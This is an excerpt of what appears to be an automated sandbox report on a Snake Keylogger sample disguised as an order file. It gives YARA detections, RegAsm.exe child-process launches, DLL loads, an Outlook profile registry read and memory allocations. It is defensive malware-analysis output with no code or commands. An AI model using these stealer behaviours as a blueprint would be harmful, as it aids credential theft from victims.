                Source: 0.2.JB#40044 Order.exe.383dd28.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.JB#40044 Order.exe.383dd28.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.JB#40044 Order.exe.3855f50.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.JB#40044 Order.exe.3855f50.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.JB#40044 Order.exe.386e170.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.JB#40044 Order.exe.386e170.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.JB#40044 Order.exe.386e170.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.JB#40044 Order.exe.386e170.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.JB#40044 Order.exe.3855f50.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.JB#40044 Order.exe.3855f50.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.JB#40044 Order.exe.383dd28.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.JB#40044 Order.exe.383dd28.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000001.00000002.4092547018.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1642087584.00000000037E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: JB#40044 Order.exe PID: 7564, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegAsm.exe PID: 7588, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: JB#40044 Order.exe, XBXNSFFNSFJFSETWYYWEYHWEEHWH.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.2.JB#40044 Order.exe.386e170.2.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.JB#40044 Order.exe.386e170.2.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.JB#40044 Order.exe.3855f50.1.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.JB#40044 Order.exe.3855f50.1.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.JB#40044 Order.exe.383dd28.0.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.JB#40044 Order.exe.383dd28.0.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@3/3
                Source: C:\Users\user\Desktop\JB#40044 Order.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\JB#40044 Order.exe.logJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                Source: JB#40044 Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: JB#40044 Order.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\JB#40044 Order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: JB#40044 Order.exeVirustotal: Detection: 44%
                Source: JB#40044 Order.exeReversingLabs: Detection: 42%
                Source: unknownProcess created: C:\Users\user\Desktop\JB#40044 Order.exe "C:\Users\user\Desktop\JB#40044 Order.exe"
                Source: C:\Users\user\Desktop\JB#40044 Order.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Users\user\Desktop\JB#40044 Order.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: JB#40044 Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: JB#40044 Order.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: JB#40044 Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\Users\Administrator\Source\Repos\QWEORITU\QWEORITU\obj\Debug\CTTUUEH.pdb source: JB#40044 Order.exe
                Source: JB#40044 Order.exeStatic PE information: 0xD2A80BC6 [Mon Dec 29 10:07:02 2081 UTC]
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_017BF273 push ebp; retf 1_2_017BF281
                Source: C:\Users\user\Desktop\JB#40044 Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeMemory allocated: 25B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeMemory allocated: 27E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\JB#40044 Order.exeMemory allocated: 25B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 17B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 3200000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 5200000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 9830000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 7F70000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 9830000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 9D30000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 79A0000 memory reserve | memory write watchJump to behavior
